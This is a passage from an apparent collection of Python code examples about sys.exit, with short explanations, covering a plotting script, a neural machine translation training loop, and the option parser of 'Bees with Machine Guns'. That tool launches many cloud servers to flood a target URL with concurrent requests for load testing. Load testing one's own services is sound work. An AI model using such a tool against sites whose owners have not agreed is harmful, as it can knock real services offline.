    template_path = os.path.join(my_dir, 'template.html')
    template = open(template_path, 'r').read()
    template = template.replace(
        '{{ TM_BUNDLE_SUPPORT }}',
        os.environ['TM_BUNDLE_SUPPORT']
    )
    template = template.replace('{{ EJS_TEMPLATE }}', json.dumps(content_ejs))
    template = template.replace('{{ CONTEXT }}', json.dumps(context))

    print(template)
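
Note that both failure paths above call sys.exit() with no argument, which exits with status 0 (equivalent to sys.exit(None)): the error is reported through the rendered HTML message rather than the exit code. A minimal sketch of that pattern, with a hypothetical show_error_message stand-in:

import subprocess
import sys

def show_error_message(html):
    # Hypothetical stand-in for the bundle's HTML error window.
    print(html)

def run_tool(args):
    try:
        proc = subprocess.Popen(args, stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
    except OSError as e:
        show_error_message('could not run %s: %s' % (args[0], e))
        # No argument means a zero exit status: the script stops,
        # but the caller sees a clean exit.
        sys.exit()
    return proc.communicate(b'')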

Example 171

Project: ndgrutedb Source File: smallDistPlot.py
def newPlotStdMean(invDir, pngName, char, numBins=100, function='mean', numLCCVerticesfn=None):

  MADdir = "MAD"
  ccDir = "ClustCoeff"
  DegDir = "Degree"
  EigDir = "Eigen/values"
  SS1dir = "ScanStat1"
  triDir = "Triangle"

  invDirs = [triDir, ccDir, SS1dir, DegDir ]

  print "function =" + function

  charVal = 'Classification' if char == 'class' else 'Gender'
  funcVal = '$\mu$' if function == 'mean' else '$\sigma$'

  nrows = 3
  ncols=2

  if not numLCCVerticesfn:
    matDimZero = 70
  else:
    matDimZero = getMaxVertices(numLCCVerticesfn)
    print "Max dimension --> ", matDimZero

  if not os.path.exists(invDir):
    print "%s does not exist" % invDir
    sys.exit(1)

  pl.figure(2)
  fig_gl, axes = pl.subplots(nrows=nrows, ncols=ncols)
  #fig_gl.tight_layout()

  for idx, drcty in enumerate (invDirs):

    matricesArray = assembleAggMatrices(glob(os.path.join(invDir, drcty,'*.npy')), char, matDimZero)
    processingArrs = perfOpOnMatrices(matricesArray, function, True)

    for proccCnt, arr in enumerate(processingArrs):
      pl.figure(1)
      n, bins, patches = pl.hist(arr, bins=numBins, range=None, normed=False, weights=None, cumulative=False, \
               bottom=None, histtype='stepfilled', align='mid', orientation='vertical', \
               rwidth=None, log=False, color=None, label=None, hold=None)

      n = np.append(n,0)
      n = n/float(sum(n))

      # Interpolation
      f = interpolate.interp1d(bins, n, kind='cubic')

      if numLCCVerticesfn:
        x = np.arange(bins[0],bins[-1],0.03) # vary linspace step
      else:
        x = np.arange(bins[0],bins[-1],0.07) # vary linspace step

      interp = f(x)
      ltz = interp < 0
      interp[ltz] = 0

      fig = pl.figure(2)
      fig.subplots_adjust(hspace=.6)

      #ax = pl.subplot(nrows,ncols,(idx*ncols)+2) if proccCnt > 0 else pl.subplot(nrows,ncols,(idx*ncols)+1)
      ax = pl.subplot(nrows,ncols,idx+1)

      plot_color = getPlotColor(proccCnt, allmat = False)

      if function == 'mean':
        pl.plot(x, interp*100, color = plot_color, linewidth=1)
      elif function == 'stddev':
        pl.plot(x, interp, color = plot_color, linewidth=1)

      if idx == 0:
        if function == 'mean':
          if numLCCVerticesfn:
            pass
            #plt.axis([0, 35, 0, 0.04])
            #ax.set_yticks(scipy.arange(0,0.04,0.01))
          else:
            ax.set_yticks(scipy.arange(0,7,2))
        elif function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.07,0.02))
        if proccCnt == 0:
          if function == 'mean':
            pl.ylabel('Percent')
          elif function == 'stddev':
            pl.ylabel('Magnitude')
          pl.xlabel('Log Number of Local Triangles')
        else:
          pl.xlabel('Log Number of Triangles')

      if idx == 1:
        if function == 'mean':
          if numLCCVerticesfn:
            #ax.set_yticks(scipy.arange(0,0.03,0.01))
            pass
          else:
            ax.set_yticks(scipy.arange(0,10,2))
        elif function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.15,0.03))

        pl.xlabel('Log Local Clustering Coefficient')

      if idx == 2:
        if function == 'mean':
          if numLCCVerticesfn:
            pass
            #ax.set_yticks(scipy.arange(0,0.03,0.01))
          else:
            ax.set_yticks(scipy.arange(0,8,2))
        elif function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.08,0.02))
        if proccCnt == 0:
          if function == 'mean':
            pl.ylabel('Percent')
          elif function == 'stddev':
            pl.ylabel('Magnitude')

        pl.xlabel('Log Scan_1 Statistic')

      if idx == 3:
        if function == 'mean':
          if numLCCVerticesfn:
            pass
            #ax.set_yticks(scipy.arange(0,0.04,0.01))
          else:
            ax.set_yticks(scipy.arange(0,6,2))
        if function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.08,0.02))
          ax.set_xticks(scipy.arange(-2.5,2.0,1.0))

        pl.xlabel('Log Degree')

  #### Eigenvalues ####

  if not numLCCVerticesfn:
    numEigs = 68
  else:
    numEigs = 100

  ax = pl.subplot(nrows,ncols,5)
  matricesArray = assembleAggMatrices(glob(os.path.join(invDir, EigDir,'*.npy')), char, numEigs, eig = True)
  processingArrs = perfOpOnMatrices(matricesArray, function, False)

  for proccCnt, arr in enumerate (processingArrs):
    plot_color = getPlotColor(proccCnt, allmat = False)

    fig = pl.figure(2)
    fig.subplots_adjust(hspace=.6)

    if function == 'mean':
      if numLCCVerticesfn:
        pass
      else:
        ax.set_yticks(scipy.arange(-0.2,0.2,0.1))
      pl.plot(range(1,len(arr)+1), arr/10000, color=plot_color)
    elif function == 'stddev':
      ax.set_yticks(scipy.arange(0,35,10))
      pl.plot(range(1,len(arr)+1), arr/10, color=plot_color)

  pl.xlabel('Eigenvalue rank')
  if function == 'mean':
    pl.ylabel('Magnitude x $10^4$ ')
  elif function == 'stddev':
    pl.ylabel('Magnitude x $ 10$ ')

  pl.xlabel('Eigenvalue rank')

  ######## Global Edge number #######

  charDict, zero_type, one_type, two_type = csvtodict(char = char)
  ax = pl.subplot(nrows,ncols,6)

  arrfn = os.path.join(invDir, 'Globals/numEdgesDict.npy')
  try:
    ass_ray = np.load(arrfn).item() # associative array
    print "Processing %s..." % arrfn
  except IOError:
    print "[ERROR]: Line %s: Invariant file not found %s" % (lineno(), arrfn)
    sys.exit(1)  # ass_ray would be undefined below, so stop here

  zeros = []
  ones = []
  twos = []

  for key in ass_ray.keys():
    if charDict[key] == '0':
      zeros.append(ass_ray[key])
    if charDict[key] == '1':
      ones.append(ass_ray[key])
    if charDict[key] == '2':
      twos.append(ass_ray[key])

  processingArrs = [zeros, ones]
  if char == 'class':
    processingArrs.append(twos)

  for proccCnt, arr in enumerate (processingArrs):
    pl.figure(1)

    arr = np.log(np.array(arr)[np.array(arr).nonzero()]) # NOTE THIS CHANGE

    n, bins, patches = pl.hist(arr, bins=10, range=None, normed=False, weights=None, cumulative=False, \
             bottom=None, histtype='stepfilled', align='mid', orientation='vertical', \
             rwidth=None, log=False, color=None, label=None, hold=None)

    n = np.append(n,0)
    fig = pl.figure(2)
    fig.subplots_adjust(hspace=.5)

    pl.ylabel('Frequency')

    pl.xlabel('Log Global Edge Number')
    if numLCCVerticesfn:
      pass
    else:
      #ax.set_yticks(scipy.arange(0,15,3))
      #ax.set_xticks(scipy.arange(800,1250,200))
      pass

    f = interpolate.interp1d(bins, n, kind='cubic')
    x = np.arange(bins[0],bins[-1],0.01) # vary linspace step

    interp = f(x)
    ltz = interp < 0
    interp[ltz] = 0

    plot_color = getPlotColor(proccCnt, allmat = False)
    pl.plot(x, interp,color = plot_color ,linewidth=1)

  pl.savefig(pngName+'.pdf')
  print '~**** Done  ****~'
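
Here sys.exit(1) serves as an early guard: if the invariants directory is missing, the script stops with a non-zero status before any plotting starts. The guard distilled into a minimal, standard-library-only sketch:

import os
import sys

def require_dir(path):
    # Fail fast with a non-zero exit status when a required
    # input directory is missing.
    if not os.path.exists(path):
        print("%s does not exist" % path)
        sys.exit(1)

require_dir(os.getcwd())  # the current directory exists, so this passes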

Example 172

Project: beeswithmachineguns Source File: main.py
Function: parse_options
def parse_options():
    """
    Handle the command line arguments for spinning up bees
    """
    parser = OptionParser(usage="""
bees COMMAND [options]

Bees with Machine Guns

A utility for arming (creating) many bees (small EC2 instances) to attack
(load test) targets (web applications).

commands:
  up      Start a batch of load testing servers.
  attack  Begin the attack on a specific url.
  down    Shutdown and deactivate the load testing servers.
  report  Report the status of the load testing servers.
    """)

    up_group = OptionGroup(parser, "up",
                           """In order to spin up new servers you will need to specify at least the -k command, which is the name of the EC2 keypair to use for creating and connecting to the new servers. The bees will expect to find a .pem file with this name in ~/.ssh/. Alternatively, bees can use SSH Agent for the key.""")

    # Required
    up_group.add_option('-k', '--key',  metavar="KEY",  nargs=1,
                        action='store', dest='key', type='string',
                        help="The ssh key pair name to use to connect to the new servers.")

    up_group.add_option('-s', '--servers', metavar="SERVERS", nargs=1,
                        action='store', dest='servers', type='int', default=5,
                        help="The number of servers to start (default: 5).")
    up_group.add_option('-g', '--group', metavar="GROUP", nargs=1,
                        action='store', dest='group', type='string', default='default',
                        help="The security group(s) to run the instances under (default: default).")
    up_group.add_option('-z', '--zone',  metavar="ZONE",  nargs=1,
                        action='store', dest='zone', type='string', default='us-east-1d',
                        help="The availability zone to start the instances in (default: us-east-1d).")
    up_group.add_option('-i', '--instance',  metavar="INSTANCE",  nargs=1,
                        action='store', dest='instance', type='string', default='ami-ff17fb96',
                        help="The instance-id to use for each server from (default: ami-ff17fb96).")
    up_group.add_option('-t', '--type',  metavar="TYPE",  nargs=1,
                        action='store', dest='type', type='string', default='t1.micro',
                        help="The instance-type to use for each server (default: t1.micro).")
    up_group.add_option('-l', '--login',  metavar="LOGIN",  nargs=1,
                        action='store', dest='login', type='string', default='newsapps',
                        help="The ssh username name to use to connect to the new servers (default: newsapps).")
    up_group.add_option('-v', '--subnet',  metavar="SUBNET",  nargs=1,
                        action='store', dest='subnet', type='string', default=None,
                        help="The vpc subnet id in which the instances should be launched. (default: None).")
    up_group.add_option('-b', '--bid', metavar="BID", nargs=1,
                        action='store', dest='bid', type='float', default=None,
                        help="The maximum bid price per spot instance (default: None).")

    parser.add_option_group(up_group)

    attack_group = OptionGroup(parser, "attack",
                               """Beginning an attack requires only that you specify the -u option with the URL you wish to target.""")

    # Required
    attack_group.add_option('-u', '--url', metavar="URL", nargs=1,
                            action='store', dest='url', type='string',
                            help="URL of the target to attack.")
    attack_group.add_option('-K', '--keepalive', metavar="KEEP_ALIVE", nargs=0,
                            action='store', dest='keep_alive', type='string', default=False,
                            help="Keep-Alive connection.")
    attack_group.add_option('-p', '--post-file',  metavar="POST_FILE",  nargs=1,
                            action='store', dest='post_file', type='string', default=False,
                            help="The POST file to deliver with the bee's payload.")
    attack_group.add_option('-m', '--mime-type',  metavar="MIME_TYPE",  nargs=1,
                            action='store', dest='mime_type', type='string', default='text/plain',
                            help="The MIME type to send with the request.")
    attack_group.add_option('-n', '--number', metavar="NUMBER", nargs=1,
                            action='store', dest='number', type='int', default=1000,
                            help="The number of total connections to make to the target (default: 1000).")
    attack_group.add_option('-C', '--cookies', metavar="COOKIES", nargs=1, action='store', dest='cookies',
                            type='string', default='',
                            help='Cookies to send during http requests. The cookies should be passed using standard cookie formatting, separated by semi-colons and assigned with equals signs.')
    attack_group.add_option('-c', '--concurrent', metavar="CONCURRENT", nargs=1,
                            action='store', dest='concurrent', type='int', default=100,
                            help="The number of concurrent connections to make to the target (default: 100).")
    attack_group.add_option('-H', '--headers', metavar="HEADERS", nargs=1,
                            action='store', dest='headers', type='string', default='',
                            help="HTTP headers to send to the target to attack. Multiple headers should be separated by semi-colons, e.g header1:value1;header2:value2")
    attack_group.add_option('-e', '--csv', metavar="FILENAME", nargs=1,
                            action='store', dest='csv_filename', type='string', default='',
                            help="Store the distribution of results in a csv file for all completed bees (default: '').")
    attack_group.add_option('-P', '--contenttype', metavar="CONTENTTYPE", nargs=1,
                            action='store', dest='contenttype', type='string', default='text/plain',
                            help="ContentType header to send to the target of the attack.")
    attack_group.add_option('-I', '--sting', metavar="sting", nargs=1,
                            action='store', dest='sting', type='int', default=1,
                            help="The flag to sting (ping to cache) url before attack (default: 1). 0: no sting, 1: sting sequentially, 2: sting in parallel")
    attack_group.add_option('-S', '--seconds', metavar="SECONDS", nargs=1,
                            action='store', dest='seconds', type='int', default=60,
                            help= "hurl only: The number of total seconds to attack the target (default: 60).")
    attack_group.add_option('-X', '--verb', metavar="VERB", nargs=1,
                            action='store', dest='verb', type='string', default='',
                            help= "hurl only: Request command -HTTP verb to use -GET/PUT/etc. Default GET")
    attack_group.add_option('-M', '--rate', metavar="RATE", nargs=1,
                            action='store', dest='rate', type='int',
                            help= "hurl only: Max Request Rate.")
    attack_group.add_option('-a', '--threads', metavar="THREADS", nargs=1,
                            action='store', dest='threads', type='int', default=1,
                            help= "hurl only: Number of parallel threads. Default: 1")
    attack_group.add_option('-f', '--fetches', metavar="FETCHES", nargs=1,
                            action='store', dest='fetches', type='int', 
                            help= "hurl only: Num fetches per instance.")
    attack_group.add_option('-d', '--timeout', metavar="TIMEOUT", nargs=1,
                            action='store', dest='timeout', type='int',
                            help= "hurl only: Timeout (seconds).")
    attack_group.add_option('-E', '--send_buffer', metavar="SEND_BUFFER", nargs=1,
                            action='store', dest='send_buffer', type='int',
                            help= "hurl only: Socket send buffer size.")
    attack_group.add_option('-F', '--recv_buffer', metavar="RECV_BUFFER", nargs=1,
                            action='store', dest='recv_buffer', type='int',
                            help= "hurl only: Socket receive buffer size.")
    # Optional
    attack_group.add_option('-T', '--tpr', metavar='TPR', nargs=1, action='store', dest='tpr', default=None, type='float',
                            help='The upper bounds for time per request. If this option is passed and the target is below the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-R', '--rps', metavar='RPS', nargs=1, action='store', dest='rps', default=None, type='float',
                            help='The lower bounds for request per second. If this option is passed and the target is above the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-A', '--basic_auth', metavar='basic_auth', nargs=1, action='store', dest='basic_auth', default='', type='string',
                            help='BASIC authentication credentials, format auth-username:password (default: None).')
    attack_group.add_option('-j', '--hurl', metavar="HURL_COMMANDS",
                            action='store_true', dest='hurl',
                            help="use hurl")
    attack_group.add_option('-o', '--long_output', metavar="LONG_OUTPUT",
                            action='store_true', dest='long_output',
                            help="display hurl output")
    attack_group.add_option('-L', '--responses_per', metavar="RESPONSE_PER",
                            action='store_true', dest='responses_per',
                            help="hurl only: Display http(s) response codes per interval instead of request statistics")


    parser.add_option_group(attack_group)

    (options, args) = parser.parse_args()

    if len(args) <= 0:
        parser.error('Please enter a command.')

    command = args[0]
    # delay (seconds) between spinning up worker threads
    delay = 0.2

    if command == 'up':
        if not options.key:
            parser.error('To spin up new instances you need to specify a key-pair name with -k')

        if options.group == 'default':
            print('New bees will use the "default" EC2 security group. Please note that port 22 (SSH) is not normally open on this group. You will need to use to the EC2 tools to open it before you will be able to attack.')
        zones = options.zone.split(',')
        if len(zones) > 1:
            if len(options.instance.split(',')) != len(zones):
                print("Your instance count does not match zone count")
                sys.exit(1)
            else:
                ami_list = options.instance.split(',')
                zone_list = zones
                # for each ami and zone set zone and instance
                for tup_val in zip(ami_list, zone_list):
                    options.instance, options.zone = tup_val
                    threading.Thread(target=bees.up, args=(options.servers, options.group,
                                                            options.zone, options.instance,
                                                            options.type,options.login,
                                                            options.key, options.subnet,
                                                            options.bid)).start()
                    #time allowed between threads
                    time.sleep(delay)
        else:
            bees.up(options.servers, options.group, options.zone, options.instance, options.type, options.login, options.key, options.subnet, options.bid)

    elif command == 'attack':
        if not options.url:
            parser.error('To run an attack you need to specify a url with -u')

        regions_list = []
        for region in bees._get_existing_regions():
                regions_list.append(region)

        # urlparse needs a scheme in the url. ab doesn't, so add one just for the sake of parsing.
        # urlparse('google.com').path == 'google.com' and urlparse('google.com').netloc == '' -> True
        parsed = urlparse(options.url) if '://' in options.url else urlparse('http://'+options.url)
        if parsed.path == '':
            options.url += '/'
        additional_options = dict(
            cookies=options.cookies,
            headers=options.headers,
            post_file=options.post_file,
            keep_alive=options.keep_alive,
            mime_type=options.mime_type,
            csv_filename=options.csv_filename,
            tpr=options.tpr,
            rps=options.rps,
            basic_auth=options.basic_auth,
            contenttype=options.contenttype,
            sting=options.sting,
            hurl=options.hurl,
            seconds=options.seconds,
            rate=options.rate,
            long_output=options.long_output,
            responses_per=options.responses_per,
            verb=options.verb,
            threads=options.threads,
            fetches=options.fetches,
            timeout=options.timeout,
            send_buffer=options.send_buffer,
            recv_buffer=options.recv_buffer
        )
        if options.hurl:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.hurl_attack, args=(options.url, options.number, options.concurrent),
                    kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)
        else:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.attack, args=(options.url, options.number,
                    options.concurrent), kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)

    elif command == 'down':
        bees.down()
    elif command == 'report':
        bees.report()
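
This example mixes two exit mechanisms: parser.error() for missing required options (optparse's error() prints the usage message and itself calls sys.exit(2)), and an explicit sys.exit(1) when the comma-separated zone and instance lists cannot be paired up. A minimal sketch of the explicit check, with made-up argument values:

import sys

def check_zone_ami_pairing(zones, instances):
    # Each AMI must be zipped with exactly one availability zone,
    # so the comma-separated lists have to be the same length.
    if len(zones.split(',')) != len(instances.split(',')):
        print("Your instance count does not match zone count")
        sys.exit(1)

check_zone_ami_pairing('us-east-1a,us-east-1b', 'ami-1,ami-2')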

Example 173

Project: dl4mt-c2c Source File: nmt.py
def train(
      highway=2,
      dim_word=100,
      dim_word_src=200,
      enc_dim=1000,
      dec_dim=1000,  # the number of LSTM units
      model_name="model_name",
      conv_width=4,
      conv_nkernels=256,
      pool_window=-1,
      pool_stride=-1,
      patience=-1,  # early stopping patience
      max_epochs=5000,
      finish_after=-1,  # finish after this many updates
      decay_c=0.,  # L2 regularization penalty
      alpha_c=0.,  # alignment regularization
      clip_c=-1.,  # gradient clipping threshold
      lrate=0.01,  # learning rate
      n_words_src=100000,  # source vocabulary size
      n_words=100000,  # target vocabulary size
      maxlen=1000,  # maximum length of the description
      maxlen_trg=1000,  # maximum length of the description
      maxlen_sample=1000,
      optimizer='rmsprop',
      batch_size=16,
      valid_batch_size=16,
      sort_size=20,
      model_path=None,
      save_file_name='model',
      save_best_models=0,
      dispFreq=100,
      validFreq=100,
      saveFreq=1000,   # save the parameters after every saveFreq updates
      sampleFreq=-1,
      pbatchFreq=-1,
      verboseFreq=10000,
      datasets=[
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok'],
      valid_datasets=['../data/dev/newstest2011.en.tok',
                      '../data/dev/newstest2011.fr.tok'],
      dictionaries=[
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok.pkl',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok.pkl'],
      source_word_level=0,
      target_word_level=0,
      dropout_gru=False,
      dropout_softmax=False,
      re_load=False,
      re_load_old_setting=False,
      uidx=None,
      eidx=None,
      cidx=None,
      layers=None,
      save_every_saveFreq=0,
      save_burn_in=20000,
      use_bpe=0,
      quit_immediately=False,
      init_params=None,
      build_model=None,
      build_sampler=None,
      gen_sample=None,
      prepare_data=None,
      **kwargs
    ):

    # Model options
    model_options = locals().copy()
    del model_options['init_params']
    del model_options['build_model']
    del model_options['build_sampler']
    del model_options['gen_sample']
    del model_options['prepare_data']

    # load dictionaries and invert them
    worddicts = [None] * len(dictionaries)
    worddicts_r = [None] * len(dictionaries)
    for ii, dd in enumerate(dictionaries):
        with open(dd, 'rb') as f:
            worddicts[ii] = cPickle.load(f)
        worddicts_r[ii] = dict()
        for kk, vv in worddicts[ii].iteritems():
            worddicts_r[ii][vv] = kk

    print 'Building model'
    if not os.path.exists(model_path):
        os.makedirs(model_path)

    file_name = '%s%s.npz' % (model_path, save_file_name)
    best_file_name = '%s%s.best.npz' % (model_path, save_file_name)
    opt_file_name = '%s%s%s.npz' % (model_path, save_file_name, '.grads')
    best_opt_file_name = '%s%s%s.best.npz' % (model_path, save_file_name, '.grads')
    model_name = '%s%s.pkl' % (model_path, save_file_name)
    params = init_params(model_options)

    cnt = 0
    cnt_emb = 0
    conv_params, hw_params = 0, 0
    for kk, vv in params.iteritems():
        if (kk == "Wemb"):
            print kk, vv.size
            cnt_emb += vv.size
        if "conv" in kk:
            print kk, vv.size
            conv_params += vv.size
        if "hw" in kk:
            print kk, vv.size
            hw_params += vv.size
        cnt += vv.size
    print "# Total params:", cnt
    print "# Emb params:", cnt_emb
    print "# Conv params:", conv_params
    print "# HW params:", hw_params
    print "# Input params:", cnt_emb + conv_params + hw_params

    if quit_immediately:
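        # when quit_immediately is set, stop right after reporting
        # the parameter counts above instead of starting training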
        sys.exit(1)

    cPickle.dump(model_options, open(model_name, 'wb'))
    history_errs = []

    # reload options
    # reload : False
    if re_load and os.path.exists(file_name):
        print 'You are reloading your experiment.. do not panic dude..'
        if re_load_old_setting:
            with open(model_name, 'rb') as f:
                model_options = cPickle.load(f)
        params = load_params(file_name, params)
        # reload history
        model = numpy.load(file_name)
        history_errs = list(model['history_errs'])
        if uidx is None:
            uidx = model['uidx']
        if eidx is None:
            eidx = model['eidx']
        if cidx is None:
            try:
                cidx = model['cidx']
            except:
                cidx = 0
    else:
        if uidx is None:
            uidx = 0
        if eidx is None:
            eidx = 0
        if cidx is None:
            cidx = 0

    print 'Loading data'
    train = TextIterator(source=datasets[0],
                         target=datasets[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=batch_size,
                         sort_size=sort_size)

    valid = TextIterator(source=valid_datasets[0],
                         target=valid_datasets[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=valid_batch_size,
                         sort_size=sort_size)

    # create shared variables for parameters
    tparams = init_tparams(params)

    trng, use_noise, \
        x, x_mask, y, y_mask, \
        opt_ret, \
        cost = \
        build_model(tparams, model_options)
    # NOTE : this is where we build the model
    inps = [x, x_mask, y, y_mask]

    print 'Building sampler...\n',
    f_init, f_next = build_sampler(tparams, model_options, trng, use_noise)
    #print 'Done'

    # before any regularizer
    print 'Building f_log_probs...',
    f_log_probs = theano.function(inps, cost, profile=profile)
    # NOTE : f_log_probs : [x, x_mask, y, y_mask], cost
    print 'Done'

    if re_load: 
        use_noise.set_value(0.)
        valid_errs = pred_probs(f_log_probs,
                                prepare_data,
                                model_options,
                                valid,
                                pool_stride,
                                verboseFreq=verboseFreq,
                               )
        valid_err = valid_errs.mean()

        if numpy.isnan(valid_err):
            import ipdb
            ipdb.set_trace()

        print 'Reload sanity check: Valid ', valid_err

    cost = cost.mean()

    # apply L2 regularization on weights
    # decay_c : 0
    if decay_c > 0.:
        decay_c = theano.shared(numpy.float32(decay_c), name='decay_c')
        weight_decay = 0.
        for kk, vv in tparams.iteritems():
            weight_decay += (vv ** 2).sum()
        weight_decay *= decay_c
        cost += weight_decay

    # regularize the alpha weights
    # alpha_c : 0
    if alpha_c > 0. and not model_options['decoder'].endswith('simple'):
        alpha_c = theano.shared(numpy.float32(alpha_c), name='alpha_c')
        alpha_reg = alpha_c * (
            (tensor.cast(y_mask.sum(0) // x_mask.sum(0), 'float32')[:, None] -
             opt_ret['dec_alphas'].sum(0))**2).sum(1).mean()
        cost += alpha_reg

    # after all regularizers - compile the computational graph for cost
    print 'Building f_cost...',
    f_cost = theano.function(inps, cost, profile=profile)
    # NOTE : why is this not referenced somewhere later?
    print 'Done'

    print 'Computing gradient...',
    grads = tensor.grad(cost, wrt=itemlist(tparams))
    print 'Done'

    if clip_c > 0:
        grads, not_finite, clipped = gradient_clipping(grads, tparams, clip_c)
    else:
        not_finite = 0
        clipped = 0

    # compile the optimizer, the actual computational graph is compiled here
    lr = tensor.scalar(name='lr')
    print 'Building optimizers...',
    if re_load and os.path.exists(file_name):
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped,
                                                                  file_name=opt_file_name)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  file_name=opt_file_name)
    else:
        # re_load = False, clip_c = 1
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost)

            # f_grad_shared = theano.function(inp, [cost, not_finite, clipped], updates=gsup, profile=profile)

            # f_update = theano.function([lr], [], updates=updates,
            #                   on_unused_input='ignore', profile=profile)
            # toptparams

    print 'Done'

    print 'Optimization'
    best_p = None
    bad_counter = 0

    if validFreq == -1:
        validFreq = len(train[0]) / batch_size
    if saveFreq == -1:
        saveFreq = len(train[0]) / batch_size

    # Training loop
    ud_start = time.time()
    estop = False

    if re_load:
        print "Checkpointed minibatch number: %d" % cidx
        for cc in xrange(cidx):
            if numpy.mod(cc, 1000)==0:
                print "Jumping [%d / %d] examples" % (cc, cidx)
            train.next()

    for epoch in xrange(max_epochs):
        time0 = time.time()
        n_samples = 0
        NaN_grad_cnt = 0
        NaN_cost_cnt = 0
        clipped_cnt = 0
        if re_load:
            re_load = 0
        else:
            cidx = 0

        for x, y in train:
        # NOTE : x, y are [sen1, sen2, sen3 ...] where sen_i are of different length
        # NOTE : at this time, x, y are simply python lists
        # NOTE : after prepare_data they get converted to numpy lists
            cidx += 1
            uidx += 1
            use_noise.set_value(1.)

            x, x_mask, y, y_mask, n_x = prepare_data(x,
                                                     y,
                                                     pool_stride,
                                                     maxlen=maxlen,
                                                     maxlen_trg=maxlen_trg,
                                                    )

            if uidx == 1 or ( numpy.mod(uidx, pbatchFreq) == 0 and pbatchFreq != -1 ):
                pbatch(x, worddicts_r[0])

            if x is None:
                print 'Minibatch with zero sample under length ', maxlen
                uidx -= 1
                uidx = max(uidx, 0)
                continue

            n_samples += n_x

            # compute cost, grads and copy grads to shared variables

            if clip_c > 0:
                cost, not_finite, clipped = f_grad_shared(x, x_mask, y, y_mask)
            else:
                cost = f_grad_shared(x, x_mask, y, y_mask)

            if clipped:
                clipped_cnt += 1

            # check for bad numbers, usually we remove non-finite elements
            # and continue training - but not done here
            if numpy.isnan(cost) or numpy.isinf(cost):
                import ipdb
                ipdb.set_trace()
                NaN_cost_cnt += 1

            if not_finite:
                import ipdb
                ipdb.set_trace()
                NaN_grad_cnt += 1
                continue

            # do the update on parameters
            f_update(lrate)

            if numpy.isnan(cost) or numpy.isinf(cost):
                continue

            if float(NaN_grad_cnt) > max_epochs * 0.5 or float(NaN_cost_cnt) > max_epochs * 0.5:
                print 'Too many NaNs, abort training'
                return 1., 1., 1.

            # verbose
            if numpy.mod(uidx, dispFreq) == 0:
                ud = time.time() - ud_start
                wps = n_samples / float(time.time() - time0)
                print 'Epoch ', eidx, 'Update ', uidx, 'Cost ', cost, 'NaN_in_grad', NaN_grad_cnt,\
                      'NaN_in_cost', NaN_cost_cnt, 'Gradient_clipped', clipped_cnt, 'UD ', ud, "%.2f sentences/s" % wps
                ud_start = time.time()

            # generate some samples with the model and display them
            if numpy.mod(uidx, sampleFreq) == 0 and sampleFreq != -1:
                for jj in xrange(numpy.minimum(5, x.shape[1])):
                    # jj = min(5, n_samples)
                    stochastic = True
                    use_noise.set_value(0.)

                    # x : maxlen X n_samples
                    sample, score = gen_sample(tparams, f_init, f_next,
                                               x[:, jj][:, None],
                                               model_options, trng=trng, k=1,
                                               maxlen=maxlen_sample,
                                               stochastic=stochastic,
                                               argmax=False)
                    print
                    print 'Source ', jj, ': ',
                    if source_word_level:
                        for vv in x[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[0]:
                                if use_bpe:
                                    print (worddicts_r[0][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[0][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        source_ = []
                        for ii, vv in enumerate(x[:, jj]):
                            if vv == 0 or vv == 2 or vv == 3:
                                continue

                            if vv in worddicts_r[0]:
                                source_.append(worddicts_r[0][vv])
                            else:
                                source_.append('UNK')
                        print "".join(source_)
                    print 'Truth ', jj, ' : ',
                    if target_word_level:
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        truth_ = []
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                truth_.append(worddicts_r[1][vv])
                            else:
                                truth_.append('UNK')
                        print "".join(truth_)
                    print 'Sample ', jj, ': ',
                    if stochastic:
                        ss = sample
                    else:
                        score = score / numpy.array([len(s) for s in sample])
                        ss = sample[score.argmin()]
                    if target_word_level:
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        sample_ = []
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                sample_.append(worddicts_r[1][vv])
                            else:
                                sample_.append('UNK')
                        print "".join(sample_)
                    print

            # validate model on validation set and early stop if necessary
            if numpy.mod(uidx, validFreq) == 0:
